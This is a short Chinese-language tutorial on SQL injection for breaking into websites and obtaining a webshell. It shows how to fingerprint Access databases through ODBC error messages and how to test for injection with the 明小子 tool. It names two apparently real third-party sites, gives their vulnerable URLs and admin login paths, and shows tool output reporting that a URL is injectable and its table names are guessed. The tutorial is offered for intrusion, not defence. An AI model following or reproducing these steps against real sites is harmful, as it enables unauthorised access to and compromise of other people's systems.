今天我给大家带来的教程*注入入侵网站拿WEBSHELL原理*

内容概要：在IE返回的HTTP错误中，判断数据库类型，并且判断是否可以SQL注入.

准备工作：打开IE，工具---Internet选项---高级--- 然后拉到最下面，把 “显示好友HTTP错误"前面的勾去掉.

用到工具：明小子

---------------------------------------------------------
如何判断是否是:ACCESS数据库。

服务器返回来的信息是:
例1：http://www.qsbook.com/product.asp?id=10013299

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'id=10013299'' 中。

/product.asp，行 17

后台：http://www.qsbook.com/admin/login.asp

例2：http://www.tuoniaoyuan.com/readnews.asp?id=534

Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'

[Microsoft][ODBC Microsoft Access Driver] 字符串的语法错误 在查询表达式 'id=534'' 中。

/readnews.asp，行 5

后台：http://www.tuoniaoyuan.com/manage/index.asp
----------------------------------------------------------
用工具得到的信息：

恭喜,该URL可以注入!
数据库类型:Access数据库
提示1: 所有表名已猜解完毕!